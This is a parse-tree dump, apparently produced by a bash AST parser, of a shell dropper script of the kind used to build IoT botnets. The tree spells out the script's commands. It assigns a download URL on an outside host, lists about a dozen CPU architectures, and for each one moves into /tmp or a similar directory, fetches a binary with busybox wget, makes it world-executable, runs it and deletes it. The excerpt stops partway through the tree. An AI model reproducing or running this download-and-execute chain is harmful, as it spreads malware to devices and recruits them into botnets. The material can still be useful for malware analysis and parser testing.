CommandNode(lineno=2, pos=(12, 25), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 25), word='712'),
])
CommandNode(lineno=4, pos=(27, 61), parts=[
  AssignmentNode(lineno=4, pos=(27, 61), word='path=http://unicorn.d3dx9.ch/bin'),
])
CommandNode(lineno=6, pos=(63, 74), parts=[
  AssignmentNode(lineno=6, pos=(63, 74), word='mips=mips'),
])
CommandNode(lineno=7, pos=(75, 90), parts=[
  AssignmentNode(lineno=7, pos=(75, 90), word='mipsel=mipsel'),
])
CommandNode(lineno=8, pos=(91, 106), parts=[
  WordNode(lineno=8, pos=(91, 106), word='armv4l=armv4l'),
])
CommandNode(lineno=9, pos=(107, 122), parts=[
  WordNode(lineno=9, pos=(107, 122), word='armv5l=armv5l'),
])
CommandNode(lineno=10, pos=(123, 138), parts=[
  WordNode(lineno=10, pos=(123, 138), word='armv6l=armv6l'),
])
CommandNode(lineno=11, pos=(139, 154), parts=[
  WordNode(lineno=11, pos=(139, 154), word='armv7l=armv7l'),
])
CommandNode(lineno=12, pos=(155, 166), parts=[
  WordNode(lineno=12, pos=(155, 166), word='i586=i586'),
])
CommandNode(lineno=13, pos=(167, 178), parts=[
  WordNode(lineno=13, pos=(167, 178), word='i686=i686'),
])
CommandNode(lineno=14, pos=(179, 190), parts=[
  WordNode(lineno=14, pos=(179, 190), word='m68k=m68k'),
])
CommandNode(lineno=15, pos=(191, 200), parts=[
  WordNode(lineno=15, pos=(191, 200), word='sh4=sh4'),
])
CommandNode(lineno=16, pos=(201, 218), parts=[
  AssignmentNode(lineno=16, pos=(201, 218), word='powerpc=powerpc'),
])
CommandNode(lineno=17, pos=(219, 246), parts=[
  WordNode(lineno=17, pos=(219, 246), word='powerpc440fp=powerpc440fp'),
])
CommandNode(lineno=18, pos=(247, 262), parts=[
  WordNode(lineno=18, pos=(247, 262), word='x86_64=x86_64'),
])
CompoundNode(lineno=48, list=[
  IfNode(lineno=48, pos=(264, 4774), parts=[
    ReservedwordNode(lineno=20, pos=(264, 266), word='if'),
    ListNode(lineno=20, pos=(267, 287), parts=[
        CommandNode(lineno=20, pos=(267, 286), parts=[
          WordNode(lineno=20, pos=(267, 268), word='['),
          WordNode(lineno=20, pos=(269, 271), word='-f'),
          WordNode(lineno=20, pos=(272, 284), word='/bin/busybox'),
          WordNode(lineno=20, pos=(285, 286), word=']'),
        ]),
        OperatorNode(lineno=20, op=';', pos=(286, 287)),
      ]),
    ReservedwordNode(lineno=20, pos=(288, 292), word='then'),
    ListNode(lineno=34, pos=(293, 3145), parts=[
        CommandNode(lineno=21, pos=(293, 300), parts=[
          WordNode(lineno=21, pos=(293, 295), word='cd'),
          WordNode(lineno=21, pos=(296, 300), word='/tmp'),
        ]),
        OperatorNode(lineno=21, op='||', pos=(301, 303)),
        CommandNode(lineno=21, pos=(304, 315), parts=[
          WordNode(lineno=21, pos=(304, 306), word='cd'),
          WordNode(lineno=21, pos=(307, 315), word='/var/run'),
        ]),
        OperatorNode(lineno=21, op='||', pos=(316, 318)),
        CommandNode(lineno=21, pos=(319, 330), parts=[
          WordNode(lineno=21, pos=(319, 321), word='cd'),
          WordNode(lineno=21, pos=(322, 330), word='/dev/shm'),
        ]),
        OperatorNode(lineno=21, op='||', pos=(331, 333)),
        CommandNode(lineno=21, pos=(334, 341), parts=[
          WordNode(lineno=21, pos=(334, 336), word='cd'),
          WordNode(lineno=21, pos=(337, 341), word='/mnt'),
        ]),
        OperatorNode(lineno=21, op='||', pos=(342, 344)),
        CommandNode(lineno=21, pos=(345, 352), parts=[
          WordNode(lineno=21, pos=(345, 347), word='cd'),
          WordNode(lineno=21, pos=(348, 352), word='/var'),
        ]),
        OperatorNode(lineno=21, op=';', pos=(352, 353)),
        CommandNode(lineno=21, pos=(354, 384), parts=[
          WordNode(lineno=21, pos=(354, 366), word='/bin/busybox'),
          WordNode(lineno=21, pos=(367, 369), word='cp'),
          WordNode(lineno=21, pos=(370, 382), word='/bin/busybox'),
          WordNode(lineno=21, pos=(383, 384), word='.'),
        ]),
        OperatorNode(lineno=21, op=';', pos=(384, 385)),
        CommandNode(lineno=21, pos=(386, 415), parts=[
          WordNode(lineno=21, pos=(386, 398), word='/bin/busybox'),
          WordNode(lineno=21, pos=(399, 403), word='wget'),
          WordNode(lineno=21, pos=(404, 415), word='$path/$mips', parts=[
            ParameterNode(lineno=21, pos=(404, 409), value='path'),
            ParameterNode(lineno=21, pos=(410, 415), value='mips'),
          ]),
        ]),
        OperatorNode(lineno=21, op=';', pos=(415, 416)),
        CommandNode(lineno=21, pos=(417, 449), parts=[
          WordNode(lineno=21, pos=(417, 429), word='/bin/busybox'),
          WordNode(lineno=21, pos=(430, 433), word='cat'),
          WordNode(lineno=21, pos=(434, 439), word='$mips', parts=[
            ParameterNode(lineno=21, pos=(434, 439), value='mips'),
          ]),
          RedirectNode(lineno=21, output=
            WordNode(lineno=21, pos=(442, 449), word='busybox'), pos=(440, 449), type='>'),
        ]),
        OperatorNode(lineno=21, op=';', pos=(449, 450)),
        CommandNode(lineno=21, pos=(451, 481), parts=[
          WordNode(lineno=21, pos=(451, 463), word='/bin/busybox'),
          WordNode(lineno=21, pos=(464, 469), word='chmod'),
          WordNode(lineno=21, pos=(470, 473), word='777'),
          WordNode(lineno=21, pos=(474, 481), word='busybox'),
        ]),
        OperatorNode(lineno=21, op=';', pos=(481, 482)),
        CommandNode(lineno=21, pos=(483, 492), parts=[
          WordNode(lineno=21, pos=(483, 492), word='./busybox'),
        ]),
        OperatorNode(lineno=21, op=';', pos=(492, 493)),
        CommandNode(lineno=21, pos=(494, 508), parts=[
          WordNode(lineno=21, pos=(494, 496), word='rm'),
          WordNode(lineno=21, pos=(497, 500), word='-rf'),
          WordNode(lineno=21, pos=(501, 508), word='busybox'),
        ]),
        OperatorNode(lineno=22, op='\n', pos=(508, 509)),
        CommandNode(lineno=22, pos=(509, 516), parts=[
          WordNode(lineno=22, pos=(509, 511), word='cd'),
          WordNode(lineno=22, pos=(512, 516), word='/tmp'),
        ]),
        OperatorNode(lineno=22, op='||', pos=(517, 519)),
        CommandNode(lineno=22, pos=(520, 531), parts=[
          WordNode(lineno=22, pos=(520, 522), word='cd'),
          WordNode(lineno=22, pos=(523, 531), word='/var/run'),
        ]),
        OperatorNode(lineno=22, op='||', pos=(532, 534)),
        CommandNode(lineno=22, pos=(535, 546), parts=[
          WordNode(lineno=22, pos=(535, 537), word='cd'),
          WordNode(lineno=22, pos=(538, 546), word='/dev/shm'),
        ]),
        OperatorNode(lineno=22, op='||', pos=(547, 549)),
        CommandNode(lineno=22, pos=(550, 557), parts=[
          WordNode(lineno=22, pos=(550, 552), word='cd'),
          WordNode(lineno=22, pos=(553, 557), word='/mnt'),
        ]),
        OperatorNode(lineno=22, op='||', pos=(558, 560)),
        CommandNode(lineno=22, pos=(561, 568), parts=[
          WordNode(lineno=22, pos=(561, 563), word='cd'),
          WordNode(lineno=22, pos=(564, 568), word='/var'),
        ]),
        OperatorNode(lineno=22, op=';', pos=(568, 569)),
        CommandNode(lineno=22, pos=(570, 600), parts=[
          WordNode(lineno=22, pos=(570, 582), word='/bin/busybox'),
          WordNode(lineno=22, pos=(583, 585), word='cp'),
          WordNode(lineno=22, pos=(586, 598), word='/bin/busybox'),
          WordNode(lineno=22, pos=(599, 600), word='.'),
        ]),
        OperatorNode(lineno=22, op=';', pos=(600, 601)),
        CommandNode(lineno=22, pos=(602, 633), parts=[
          WordNode(lineno=22, pos=(602, 614), word='/bin/busybox'),
          WordNode(lineno=22, pos=(615, 619), word='wget'),
          WordNode(lineno=22, pos=(620, 633), word='$path/$mipsel', parts=[
            ParameterNode(lineno=22, pos=(620, 625), value='path'),
            ParameterNode(lineno=22, pos=(626, 633), value='mipsel'),
          ]),
        ]),
        OperatorNode(lineno=22, op=';', pos=(633, 634)),
        CommandNode(lineno=22, pos=(635, 669), parts=[
          WordNode(lineno=22, pos=(635, 647), word='/bin/busybox'),
          WordNode(lineno=22, pos=(648, 651), word='cat'),
          WordNode(lineno=22, pos=(652, 659), word='$mipsel', parts=[
            ParameterNode(lineno=22, pos=(652, 659), value='mipsel'),
          ]),
          RedirectNode(lineno=22, output=
            WordNode(lineno=22, pos=(662, 669), word='busybox'), pos=(660, 669), type='>'),
        ]),
        OperatorNode(lineno=22, op=';', pos=(669, 670)),
        CommandNode(lineno=22, pos=(671, 701), parts=[
          WordNode(lineno=22, pos=(671, 683), word='/bin/busybox'),
          WordNode(lineno=22, pos=(684, 689), word='chmod'),
          WordNode(lineno=22, pos=(690, 693), word='777'),
          WordNode(lineno=22, pos=(694, 701), word='busybox'),
        ]),
        OperatorNode(lineno=22, op=';', pos=(701, 702)),
        CommandNode(lineno=22, pos=(703, 712), parts=[
          WordNode(lineno=22, pos=(703, 712), word='./busybox'),
        ]),
        OperatorNode(lineno=22, op=';', pos=(712, 713)),
        CommandNode(lineno=22, pos=(714, 728), parts=[
          WordNode(lineno=22, pos=(714, 716), word='rm'),
          WordNode(lineno=22, pos=(717, 720), word='-rf'),
          WordNode(lineno=22, pos=(721, 728), word='busybox'),
        ]),
        OperatorNode(lineno=23, op='\n', pos=(728, 729)),
        CommandNode(lineno=23, pos=(729, 736), parts=[
          WordNode(lineno=23, pos=(729, 731), word='cd'),
          WordNode(lineno=23, pos=(732, 736), word='/tmp'),
        ]),
        OperatorNode(lineno=23, op='||', pos=(737, 739)),
        CommandNode(lineno=23, pos=(740, 751), parts=[
          WordNode(lineno=23, pos=(740, 742), word='cd'),
          WordNode(lineno=23, pos=(743, 751), word='/var/run'),
        ]),
        OperatorNode(lineno=23, op='||', pos=(752, 754)),
        CommandNode(lineno=23, pos=(755, 766), parts=[
          WordNode(lineno=23, pos=(755, 757), word='cd'),
          WordNode(lineno=23, pos=(758, 766), word='/dev/shm'),
        ]),
        OperatorNode(lineno=23, op='||', pos=(767, 769)),
        CommandNode(lineno=23, pos=(770, 777), parts=[
          WordNode(lineno=23, pos=(770, 772), word='cd'),
          WordNode(lineno=23, pos=(773, 777), word='/mnt'),
        ]),
        OperatorNode(lineno=23, op='||', pos=(778, 780)),
        CommandNode(lineno=23, pos=(781, 788), parts=[
          WordNode(lineno=23, pos=(781, 783), word='cd'),
          WordNode(lineno=23, pos=(784, 788), word='/var'),
        ]),
        OperatorNode(lineno=23, op=';', pos=(788, 789)),
        CommandNode(lineno=23, pos=(790, 820), parts=[
          WordNode(lineno=23, pos=(790, 802), word='/bin/busybox'),
          WordNode(lineno=23, pos=(803, 805), word='cp'),
          WordNode(lineno=23, pos=(806, 818), word='/bin/busybox'),
          WordNode(lineno=23, pos=(819, 820), word='.'),
        ]),
        OperatorNode(lineno=23, op=';', pos=(820, 821)),
        CommandNode(lineno=23, pos=(822, 853), parts=[
          WordNode(lineno=23, pos=(822, 834), word='/bin/busybox'),
          WordNode(lineno=23, pos=(835, 839), word='wget'),
          WordNode(lineno=23, pos=(840, 853), word='$path/$armv4l', parts=[
            ParameterNode(lineno=23, pos=(840, 845), value='path'),
            ParameterNode(lineno=23, pos=(846, 853), value='armv4l'),
          ]),
        ]),
        OperatorNode(lineno=23, op=';', pos=(853, 854)),
        CommandNode(lineno=23, pos=(855, 889), parts=[
          WordNode(lineno=23, pos=(855, 867), word='/bin/busybox'),
          WordNode(lineno=23, pos=(868, 871), word='cat'),
          WordNode(lineno=23, pos=(872, 879), word='$armv4l', parts=[
            ParameterNode(lineno=23, pos=(872, 879), value='armv4l'),
          ]),
          RedirectNode(lineno=23, output=
            WordNode(lineno=23, pos=(882, 889), word='busybox'), pos=(880, 889), type='>'),
        ]),
        OperatorNode(lineno=23, op=';', pos=(889, 890)),
        CommandNode(lineno=23, pos=(891, 921), parts=[
          WordNode(lineno=23, pos=(891, 903), word='/bin/busybox'),
          WordNode(lineno=23, pos=(904, 909), word='chmod'),
          WordNode(lineno=23, pos=(910, 913), word='777'),
          WordNode(lineno=23, pos=(914, 921), word='busybox'),
        ]),
        OperatorNode(lineno=23, op=';', pos=(921, 922)),
        CommandNode(lineno=23, pos=(923, 932), parts=[
          WordNode(lineno=23, pos=(923, 932), word='./busybox'),
        ]),
        OperatorNode(lineno=23, op=';', pos=(932, 933)),
        CommandNode(lineno=23, pos=(934, 948), parts=[
          WordNode(lineno=23, pos=(934, 936), word='rm'),
          WordNode(lineno=23, pos=(937, 940), word='-rf'),
          WordNode(lineno=23, pos=(941, 948), word='busybox'),
        ]),
        OperatorNode(lineno=24, op='\n', pos=(948, 949)),
        CommandNode(lineno=24, pos=(949, 956), parts=[
          WordNode(lineno=24, pos=(949, 951), word='cd'),
          WordNode(lineno=24, pos=(952, 956), word='/tmp'),
        ]),
        OperatorNode(lineno=24, op='||', pos=(957, 959)),
        CommandNode(lineno=24, pos=(960, 971), parts=[
          WordNode(lineno=24, pos=(960, 962), word='cd'),
          WordNode(lineno=24, pos=(963, 971), word='/var/run'),
        ]),
        OperatorNode(lineno=24, op='||', pos=(972, 974)),
        CommandNode(lineno=24, pos=(975, 986), parts=[
          WordNode(lineno=24, pos=(975, 977), word='cd'),
          WordNode(lineno=24, pos=(978, 986), word='/dev/shm'),
        ]),
        OperatorNode(lineno=24, op='||', pos=(987, 989)),
        CommandNode(lineno=24, pos=(990, 997), parts=[
          WordNode(lineno=24, pos=(990, 992), word='cd'),
          WordNode(lineno=24, pos=(993, 997), word='/mnt'),
        ]),
        OperatorNode(lineno=24, op='||', pos=(998, 1000)),
        CommandNode(lineno=24, pos=(1001, 1008), parts=[
          WordNode(lineno=24, pos=(1001, 1003), word='cd'),
          WordNode(lineno=24, pos=(1004, 1008), word='/var'),
        ]),
        OperatorNode(lineno=24, op=';', pos=(1008, 1009)),
        CommandNode(lineno=24, pos=(1010, 1040), parts=[
          WordNode(lineno=24, pos=(1010, 1022), word='/bin/busybox'),
          WordNode(lineno=24, pos=(1023, 1025), word='cp'),
          WordNode(lineno=24, pos=(1026, 1038), word='/bin/busybox'),
          WordNode(lineno=24, pos=(1039, 1040), word='.'),
        ]),
        OperatorNode(lineno=24, op=';', pos=(1040, 1041)),
        CommandNode(lineno=24, pos=(1042, 1073), parts=[
          WordNode(lineno=24, pos=(1042, 1054), word='/bin/busybox'),
          WordNode(lineno=24, pos=(1055, 1059), word='wget'),
          WordNode(lineno=24, pos=(1060, 1073), word='$path/$armv5l', parts=[
            ParameterNode(lineno=24, pos=(1060, 1065), value='path'),
            ParameterNode(lineno=24, pos=(1066, 1073), value='armv5l'),
          ]),
        ]),
        OperatorNode(lineno=24, op=';', pos=(1073, 1074)),
        CommandNode(lineno=24, pos=(1075, 1109), parts=[
          WordNode(lineno=24, pos=(1075, 1087), word='/bin/busybox'),
          WordNode(lineno=24, pos=(1088, 1091), word='cat'),
          WordNode(lineno=24, pos=(1092, 1099), word='$armv5l', parts=[
            ParameterNode(lineno=24, pos=(1092, 1099), value='armv5l'),
          ]),
          RedirectNode(lineno=24, output=
            WordNode(lineno=24, pos=(1102, 1109), word='busybox'), pos=(1100, 1109), type='>'),
        ]),
        OperatorNode(lineno=24, op=';', pos=(1109, 1110)),
        CommandNode(lineno=24, pos=(1111, 1141), parts=[
          WordNode(lineno=24, pos=(1111, 1123), word='/bin/busybox'),
          WordNode(lineno=24, pos=(1124, 1129), word='chmod'),
          WordNode(lineno=24, pos=(1130, 1133), word='777'),
          WordNode(lineno=24, pos=(1134, 1141), word='busybox'),
        ]),
        OperatorNode(lineno=24, op=';', pos=(1141, 1142)),
        CommandNode(lineno=24, pos=(1143, 1152), parts=[
          WordNode(lineno=24, pos=(1143, 1152), word='./busybox'),
        ]),
        OperatorNode(lineno=24, op=';', pos=(1152, 1153)),
        CommandNode(lineno=24, pos=(1154, 1168), parts=[
          WordNode(lineno=24, pos=(1154, 1156), word='rm'),
          WordNode(lineno=24, pos=(1157, 1160), word='-rf'),
          WordNode(lineno=24, pos=(1161, 1168), word='busybox'),
        ]),
        OperatorNode(lineno=25, op='\n', pos=(1168, 1169)),
        CommandNode(lineno=25, pos=(1169, 1176), parts=[
          WordNode(lineno=25, pos=(1169, 1171), word='cd'),
          WordNode(lineno=25, pos=(1172, 1176), word='/tmp'),
        ]),
        OperatorNode(lineno=25, op='||', pos=(1177, 1179)),
        CommandNode(lineno=25, pos=(1180, 1191), parts=[
          WordNode(lineno=25, pos=(1180, 1182), word='cd'),
          WordNode(lineno=25, pos=(1183, 1191), word='/var/run'),
        ]),
        OperatorNode(lineno=25, op='||', pos=(1192, 1194)),
        CommandNode(lineno=25, pos=(1195, 1206), parts=[
          WordNode(lineno=25, pos=(1195, 1197), word='cd'),
          WordNode(lineno=25, pos=(1198, 1206), word='/dev/shm'),
        ]),
        OperatorNode(lineno=25, op='||', pos=(1207, 1209)),
        CommandNode(lineno=25, pos=(1210, 1217), parts=[
          WordNode(lineno=25, pos=(1210, 1212), word='cd'),
          WordNode(lineno=25, pos=(1213, 1217), word='/mnt'),
        ]),
        OperatorNode(lineno=25, op='||', pos=(1218, 1220)),
        CommandNode(lineno=25, pos=(1221, 1228), parts=[
          WordNode(lineno=25, pos=(1221, 1223), word='cd'),
          WordNode(lineno=25, pos=(1224, 1228), word='/var'),
        ]),
        OperatorNode(lineno=25, op=';', pos=(1228, 1229)),
        CommandNode(lineno=25, pos=(1230, 1260), parts=[
          WordNode(lineno=25, pos=(1230, 1242), word='/bin/busybox'),
          WordNode(lineno=25, pos=(1243, 1245), word='cp'),
          WordNode(lineno=25, pos=(1246, 1258), word='/bin/busybox'),
          WordNode(lineno=25, pos=(1259, 1260), word='.'),
        ]),
        OperatorNode(lineno=25, op=';', pos=(1260, 1261)),
        CommandNode(lineno=25, pos=(1262, 1293), parts=[
          WordNode(lineno=25, pos=(1262, 1274), word='/bin/busybox'),
          WordNode(lineno=25, pos=(1275, 1279), word='wget'),
          WordNode(lineno=25, pos=(1280, 1293), word='$path/$armv6l', parts=[
            ParameterNode(lineno=25, pos=(1280, 1285), value='path'),
            ParameterNode(lineno=25, pos=(1286, 1293), value='armv6l'),
          ]),
        ]),
        OperatorNode(lineno=25, op=';', pos=(1293, 1294)),
        CommandNode(lineno=25, pos=(1295, 1329), parts=[
          WordNode(lineno=25, pos=(1295, 1307), word='/bin/busybox'),
          WordNode(lineno=25, pos=(1308, 1311), word='cat'),
          WordNode(lineno=25, pos=(1312, 1319), word='$armv6l', parts=[
            ParameterNode(lineno=25, pos=(1312, 1319), value='armv6l'),
          ]),
          RedirectNode(lineno=25, output=
            WordNode(lineno=25, pos=(1322, 1329), word='busybox'), pos=(1320, 1329), type='>'),
        ]),
        OperatorNode(lineno=25, op=';', pos=(1329, 1330)),
        CommandNode(lineno=25, pos=(1331, 1361), parts=[
          WordNode(lineno=25, pos=(1331, 1343), word='/bin/busybox'),
          WordNode(lineno=25, pos=(1344, 1349), word='chmod'),
          WordNode(lineno=25, pos=(1350, 1353), word='777'),
          WordNode(lineno=25, pos=(1354, 1361), word='busybox'),
        ]),
        OperatorNode(lineno=25, op=';', pos=(1361, 1362)),
        CommandNode(lineno=25, pos=(1363, 1372), parts=[
          WordNode(lineno=25, pos=(1363, 1372), word='./busybox'),
        ]),
        OperatorNode(lineno=25, op=';', pos=(1372, 1373)),
        CommandNode(lineno=25, pos=(1374, 1388), parts=[
          WordNode(lineno=25, pos=(1374, 1376), word='rm'),
          WordNode(lineno=25, pos=(1377, 1380), word='-rf'),
          WordNode(lineno=25, pos=(1381, 1388), word='busybox'),
        ]),
        OperatorNode(lineno=26, op='\n', pos=(1388, 1389)),
        CommandNode(lineno=26, pos=(1389, 1396), parts=[
          WordNode(lineno=26, pos=(1389, 1391), word='cd'),
          WordNode(lineno=26, pos=(1392, 1396), word='/tmp'),
        ]),
        OperatorNode(lineno=26, op='||', pos=(1397, 1399)),
        CommandNode(lineno=26, pos=(1400, 1411), parts=[
          WordNode(lineno=26, pos=(1400, 1402), word='cd'),
          WordNode(lineno=26, pos=(1403, 1411), word='/var/run'),
        ]),
        OperatorNode(lineno=26, op='||', pos=(1412, 1414)),
        CommandNode(lineno=26, pos=(1415, 1426), parts=[
          WordNode(lineno=26, pos=(1415, 1417), word='cd'),
          WordNode(lineno=26, pos=(1418, 1426), word='/dev/shm'),
        ]),
        OperatorNode(lineno=26, op='||', pos=(1427, 1429)),
        CommandNode(lineno=26, pos=(1430, 1437), parts=[
          WordNode(lineno=26, pos=(1430, 1432), word='cd'),
          WordNode(lineno=26, pos=(1433, 1437), word='/mnt'),
        ]),
        OperatorNode(lineno=26, op='||', pos=(1438, 1440)),
        CommandNode(lineno=26, pos=(1441, 1448), parts=[
          WordNode(lineno=26, pos=(1441, 1443), word='cd'),
          WordNode(lineno=26, pos=(1444, 1448), word='/var'),
        ]),
        OperatorNode(lineno=26, op=';', pos=(1448, 1449)),
        CommandNode(lineno=26, pos=(1450, 1480), parts=[
          WordNode(lineno=26, pos=(1450, 1462), word='/bin/busybox'),
          WordNode(lineno=26, pos=(1463, 1465), word='cp'),
          WordNode(lineno=26, pos=(1466, 1478), word='/bin/busybox'),
          WordNode(lineno=26, pos=(1479, 1480), word='.'),
        ]),
        OperatorNode(lineno=26, op=';', pos=(1480, 1481)),
        CommandNode(lineno=26, pos=(1482, 1513), parts=[
          WordNode(lineno=26, pos=(1482, 1494), word='/bin/busybox'),
          WordNode(lineno=26, pos=(1495, 1499), word='wget'),
          WordNode(lineno=26, pos=(1500, 1513), word='$path/$armv7l', parts=[
            ParameterNode(lineno=26, pos=(1500, 1505), value='path'),
            ParameterNode(lineno=26, pos=(1506, 1513), value='armv7l'),
          ]),
        ]),
        OperatorNode(lineno=26, op=';', pos=(1513, 1514)),
        CommandNode(lineno=26, pos=(1515, 1549), parts=[
          WordNode(lineno=26, pos=(1515, 1527), word='/bin/busybox'),
          WordNode(lineno=26, pos=(1528, 1531), word='cat'),
          WordNode(lineno=26, pos=(1532, 1539), word='$armv7l', parts=[
            ParameterNode(lineno=26, pos=(1532, 1539), value='armv7l'),
          ]),
          RedirectNode(lineno=26, output=
            WordNode(lineno=26, pos=(1542, 1549), word='busybox'), pos=(1540, 1549), type='>'),
        ]),
        OperatorNode(lineno=26, op=';', pos=(1549, 1550)),
        CommandNode(lineno=26, pos=(1551, 1581), parts=[
          WordNode(lineno=26, pos=(1551, 1563), word='/bin/busybox'),
          WordNode(lineno=26, pos=(1564, 1569), word='chmod'),
          WordNode(lineno=26, pos=(1570, 1573), word='777'),
          WordNode(lineno=26, pos=(1574, 1581), word='busybox'),
        ]),
        OperatorNode(lineno=26, op=';', pos=(1581, 1582)),
        CommandNode(lineno=26, pos=(1583, 1592), parts=[
          WordNode(lineno=26, pos=(1583, 1592), word='./busybox'),
        ]),
        OperatorNode(lineno=26, op=';', pos=(1592, 1593)),
        CommandNode(lineno=26, pos=(1594, 1608), parts=[
          WordNode(lineno=26, pos=(1594, 1596), word='rm'),
          WordNode(lineno=26, pos=(1597, 1600), word='-rf'),
          WordNode(lineno=26, pos=(1601, 1608), word='busybox'),
        ]),
        OperatorNode(lineno=27, op='\n', pos=(1608, 1609)),
        CommandNode(lineno=27, pos=(1609, 1616), parts=[
          WordNode(lineno=27, pos=(1609, 1611), word='cd'),
          WordNode(lineno=27, pos=(1612, 1616), word='/tmp'),
        ]),
        OperatorNode(lineno=27, op='||', pos=(1617, 1619)),
        CommandNode(lineno=27, pos=(1620, 1631), parts=[
          WordNode(lineno=27, pos=(1620, 1622), word='cd'),
          WordNode(lineno=27, pos=(1623, 1631), word='/var/run'),
        ]),
        OperatorNode(lineno=27, op='||', pos=(1632, 1634)),
        CommandNode(lineno=27, pos=(1635, 1646), parts=[
          WordNode(lineno=27, pos=(1635, 1637), word='cd'),
          WordNode(lineno=27, pos=(1638, 1646), word='/dev/shm'),
        ]),
        OperatorNode(lineno=27, op='||', pos=(1647, 1649)),
        CommandNode(lineno=27, pos=(1650, 1657), parts=[
          WordNode(lineno=27, pos=(1650, 1652), word='cd'),
          WordNode(lineno=27, pos=(1653, 1657), word='/mnt'),
        ]),
        OperatorNode(lineno=27, op='||', pos=(1658, 1660)),
        CommandNode(lineno=27, pos=(1661, 1668), parts=[
          WordNode(lineno=27, pos=(1661, 1663), word='cd'),
          WordNode(lineno=27, pos=(1664, 1668), word='/var'),
        ]),
        OperatorNode(lineno=27, op=';', pos=(1668, 1669)),
        CommandNode(lineno=27, pos=(1670, 1700), parts=[
          WordNode(lineno=27, pos=(1670, 1682), word='/bin/busybox'),
          WordNode(lineno=27, pos=(1683, 1685), word='cp'),
          WordNode(lineno=27, pos=(1686, 1698), word='/bin/busybox'),
          WordNode(lineno=27, pos=(1699, 1700), word='.'),
        ]),
        OperatorNode(lineno=27, op=';', pos=(1700, 1701)),
        CommandNode(lineno=27, pos=(1702, 1731), parts=[
          WordNode(lineno=27, pos=(1702, 1714), word='/bin/busybox'),
          WordNode(lineno=27, pos=(1715, 1719), word='wget'),
          WordNode(lineno=27, pos=(1720, 1731), word='$path/$i586', parts=[
            ParameterNode(lineno=27, pos=(1720, 1725), value='path'),
            ParameterNode(lineno=27, pos=(1726, 1731), value='i586'),
          ]),
        ]),
        OperatorNode(lineno=27, op=';', pos=(1731, 1732)),
        CommandNode(lineno=27, pos=(1733, 1765), parts=[
          WordNode(lineno=27, pos=(1733, 1745), word='/bin/busybox'),
          WordNode(lineno=27, pos=(1746, 1749), word='cat'),
          WordNode(lineno=27, pos=(1750, 1755), word='$i586', parts=[
            ParameterNode(lineno=27, pos=(1750, 1755), value='i586'),
          ]),
          RedirectNode(lineno=27, output=
            WordNode(lineno=27, pos=(1758, 1765), word='busybox'), pos=(1756, 1765), type='>'),
        ]),
        OperatorNode(lineno=27, op=';', pos=(1765, 1766)),
        CommandNode(lineno=27, pos=(1767, 1797), parts=[
          WordNode(lineno=27, pos=(1767, 1779), word='/bin/busybox'),
          WordNode(lineno=27, pos=(1780, 1785), word='chmod'),
          WordNode(lineno=27, pos=(1786, 1789), word='777'),
          WordNode(lineno=27, pos=(1790, 1797), word='busybox'),
        ]),
        OperatorNode(lineno=27, op=';', pos=(1797, 1798)),
        CommandNode(lineno=27, pos=(1799, 1808), parts=[
          WordNode(lineno=27, pos=(1799, 1808), word='./busybox'),
        ]),
        OperatorNode(lineno=27, op=';', pos=(1808, 1809)),
        CommandNode(lineno=27, pos=(1810, 1824), parts=[
          WordNode(lineno=27, pos=(1810, 1812), word='rm'),
          WordNode(lineno=27, pos=(1813, 1816), word='-rf'),
          WordNode(lineno=27, pos=(1817, 1824), word='busybox'),
        ]),
        OperatorNode(lineno=28, op='\n', pos=(1824, 1825)),
        CommandNode(lineno=28, pos=(1825, 1832), parts=[
          WordNode(lineno=28, pos=(1825, 1827), word='cd'),
          WordNode(lineno=28, pos=(1828, 1832), word='/tmp'),
        ]),
        OperatorNode(lineno=28, op='||', pos=(1833, 1835)),
        CommandNode(lineno=28, pos=(1836, 1847), parts=[
          WordNode(lineno=28, pos=(1836, 1838), word='cd'),
          WordNode(lineno=28, pos=(1839, 1847), word='/var/run'),
        ]),
        OperatorNode(lineno=28, op='||', pos=(1848, 1850)),
        CommandNode(lineno=28, pos=(1851, 1862), parts=[
          WordNode(lineno=28, pos=(1851, 1853), word='cd'),
          WordNode(lineno=28, pos=(1854, 1862), word='/dev/shm'),
        ]),
        OperatorNode(lineno=28, op='||', pos=(1863, 1865)),
        CommandNode(lineno=28, pos=(1866, 1873), parts=[
          WordNode(lineno=28, pos=(1866, 1868), word='cd'),
          WordNode(lineno=28, pos=(1869, 1873), word='/mnt'),
        ]),
        OperatorNode(lineno=28, op='||', pos=(1874, 1876)),
        CommandNode(lineno=28, pos=(1877, 1884), parts=[
          WordNode(lineno=28, pos=(1877, 1879), word='cd'),
          WordNode(lineno=28, pos=(1880, 1884), word='/var'),
        ]),
        OperatorNode(lineno=28, op=';', pos=(1884, 1885)),
        CommandNode(lineno=28, pos=(1886, 1916), parts=[
          WordNode(lineno=28, pos=(1886, 1898), word='/bin/busybox'),
          WordNode(lineno=28, pos=(1899, 1901), word='cp'),
          WordNode(lineno=28, pos=(1902, 1914), word='/bin/busybox'),
          WordNode(lineno=28, pos=(1915, 1916), word='.'),
        ]),
        OperatorNode(lineno=28, op=';', pos=(1916, 1917)),
        CommandNode(lineno=28, pos=(1918, 1947), parts=[
          WordNode(lineno=28, pos=(1918, 1930), word='/bin/busybox'),
          WordNode(lineno=28, pos=(1931, 1935), word='wget'),
          WordNode(lineno=28, pos=(1936, 1947), word='$path/$i686', parts=[
            ParameterNode(lineno=28, pos=(1936, 1941), value='path'),
            ParameterNode(lineno=28, pos=(1942, 1947), value='i686'),
          ]),
        ]),
        OperatorNode(lineno=28, op=';', pos=(1947, 1948)),
        CommandNode(lineno=28, pos=(1949, 1981), parts=[
          WordNode(lineno=28, pos=(1949, 1961), word='/bin/busybox'),
          WordNode(lineno=28, pos=(1962, 1965), word='cat'),
          WordNode(lineno=28, pos=(1966, 1971), word='$i686', parts=[
            ParameterNode(lineno=28, pos=(1966, 1971), value='i686'),
          ]),
          RedirectNode(lineno=28, output=
            WordNode(lineno=28, pos=(1974, 1981), word='busybox'), pos=(1972, 1981), type='>'),
        ]),
        OperatorNode(lineno=28, op=';', pos=(1981, 1982)),
        CommandNode(lineno=28, pos=(1983, 2013), parts=[
          WordNode(lineno=28, pos=(1983, 1995), word='/bin/busybox'),
          WordNode(lineno=28, pos=(1996, 2001), word='chmod'),
          WordNode(lineno=28, pos=(2002, 2005), word='777'),
          WordNode(lineno=28, pos=(2006, 2013), word='busybox'),
        ]),
        OperatorNode(lineno=28, op=';', pos=(2013, 2014)),
        CommandNode(lineno=28, pos=(2015, 2024), parts=[
